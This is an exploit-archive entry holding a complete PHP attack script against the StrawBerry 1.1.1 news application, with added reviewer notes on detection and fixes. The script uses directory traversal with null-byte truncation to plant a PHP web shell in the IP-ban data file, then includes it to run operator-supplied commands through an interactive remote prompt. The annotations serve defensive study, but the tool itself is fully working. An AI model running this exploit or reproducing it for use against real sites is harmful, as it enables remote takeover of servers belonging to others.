StrawBerry 1.1.1 LFI / Remote Command Execution Exploit

2009-05-24 / 2009-05-25
Credit: AVT
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php
/*********************************************************************
 * StrawBerry 1.1.1 LFI / Remote Command Execution Exploit
 * Site: http://strawberry.goodgirl.ru/
 *********************************************************************
 * magic_quotes_gpc = Off
 *********************************************************************
 * Author: [AVT]
 * Date : 10.05.09
 * My Site: http://antichat.ru/
 *********************************************************************/

/*
 * Reviewer notes (defensive reading of this listing):
 *
 * - Weakness class: CWE-22. The `do` query parameter of example/index.php
 *   is sent with `../` sequences and a trailing %00, so a file outside the
 *   intended directory is reached. Presumably the application appends a
 *   suffix to `do` and passes the result to include/require; that code is
 *   not shown here, so confirm against the StrawBerry source.
 * - Preconditions: the header states magic_quotes_gpc = Off. The %00
 *   truncation also depends on the PHP version: PHP rejects NUL bytes in
 *   filesystem paths since 5.3.4.
 * - Chain: a value posted to the IP-ban module is later read back from
 *   db/base/ipban.MYD through the same `do` parameter, i.e. a file that
 *   stores user input is reachable by the include.
 * - Log indicators visible in this listing: `do=` values containing `../`
 *   or `%00`; POST bodies where `add_ip` holds something other than an IP
 *   address; `cmd=` carrying base64 together with `do=...ipban.MYD`.
 * - Fix direction: map `do` through an allowlist of module names, validate
 *   `add_ip` as an address (e.g. filter_var() with FILTER_VALIDATE_IP), and
 *   keep data files out of any path that include/require can reach.
 */

set_time_limit(0);
error_reporting(0); // all PHP notices and warnings are suppressed for the whole script

// $argv[0] is the script name; the two user arguments are host and path.
list($cli,$host,$path) = $argv;

// Exactly two arguments are expected; otherwise print the usage banner and stop.
if ($argc != 3) {
    print "\no-------------------------------------------------------------o\n";
    print "\r| StrawBerry 1.1.1 LFI / Remote Command Execution Exploit |\n";
    print "\r| Site: http://strawberry.goodgirl.ru/ |\n";
    print "\ro-------------------------------------------------------------o\n";
    print "\r| Author: [AVT] |\n";
    print "\r| My Site: http://antichat.ru/ |\n";
    print "\ro-------------------------------------------------------------o\n";
    print "\r| Usage: php expl.php [host] [path] |\n";
    print "\r| host localhost |\n";
    print "\r| path /news/ |\n";
    print "\r| Example: php expl.php site.com /news/ |\n";
    print "\ro-------------------------------------------------------------o\n";
    exit;
}

// Main flow: probe first, write to the IP-ban store only when the probe
// reports that the <code> marker is not there yet, then start the prompt loop.
if (check_host ()) {
    post_shell();
}
use_shell();

/**
 * Probes whether db/base/ipban.MYD can be read through the `do` parameter.
 *
 * Sends one GET request and inspects the raw response text:
 *  - no 'a:' substring: prints the failure banner and terminates the script;
 *  - a '<code>' substring: returns false (the marker is already present);
 *  - otherwise: returns true.
 *
 * NOTE(review): 'a:' is presumably the prefix of PHP-serialized array data in
 * the ban store; the file format is not shown in this listing.
 *
 * @return bool true when the store was readable and holds no '<code>' marker
 */
function check_host () {
    global $host,$path;
    // Traversal out of example/ plus %00 to cut off whatever the application appends.
    $data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: close\r\n\r\n";
    $html = send ($host,$data);
    if (!stristr($html,'a:')) {
        print "\ro-------------------------------------------------------------o\n";
        // The line break inside the next string literal is how the listing
        // shows it (likely an extraction artifact); it is kept unchanged.
        print "\r| Exploit Failed! 
|\n";
        print "\ro-------------------------------------------------------------o\n";
        exit;
    } elseif (stristr($html,'<code>')) {
        return false;
    } else {
        return true;
    }
}

/**
 * Writes a raw HTTP request to TCP port 80 of $host and returns everything
 * read from the socket until EOF (status line, headers and body together).
 *
 * Terminates the script with a message when the connection cannot be opened.
 *
 * @param string $host target host name
 * @param string $data complete request text, including the blank line
 * @return string raw response
 */
function send ($host,$data) {
    // '@' hides the fsockopen() warning; failure is handled by die().
    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused, try again!\n");
    }
    fputs($sock,$data);
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}

/**
 * Submits the IP-ban "add" form (action=add, mod=ipban) through the same
 * `do` traversal, with the add_ip field holding PHP code wrapped in <code>
 * tags instead of an address.
 *
 * NOTE(review): the posted value presumably ends up in db/base/ipban.MYD,
 * since that is the file the other requests read back; the storage code is
 * not part of this listing. Server-side validation of add_ip as an IP
 * address would reject this value.
 *
 * @return void
 */
function post_shell() {
    global $host,$path;
    $post = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban";
    $data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($post)."\r\n\r\n";
    $data .= "$post\r\n\r\n";
    send ($host,$data);
}

/**
 * Interactive prompt loop: reads one line from STDIN, passes it to
 * exec_cmd() and prints the result. Typing exit, --exit, quit or --quit
 * (case-insensitive) ends the script.
 *
 * @return void
 */
function use_shell() {
    while (1) {
        echo "[Shell]~$: ";
        $cmd = stripslashes(trim(fgets(STDIN)));
        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die("\nExited\n");
        print exec_cmd($cmd);
    }
}

/**
 * Sends $cmd base64-encoded in the `cmd` query parameter of a request that
 * includes db/base/ipban.MYD via `do`, and returns the text found between
 * the first <code> and the last </code> in the response (the `.*` is greedy
 * and the `s` flag lets it span lines).
 *
 * @param string $cmd line typed at the prompt
 * @return string|null captured text, or null when no <code> pair is present
 */
function exec_cmd($cmd) {
    global $host,$path;
    $cmd = base64_encode($cmd);
    $data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: close\r\n\r\n";
    $html = send ($host,$data);
    preg_match_all('/<code>(.*)<\/code>/si', $html, $match);
    return $match[1][0];
}
?>

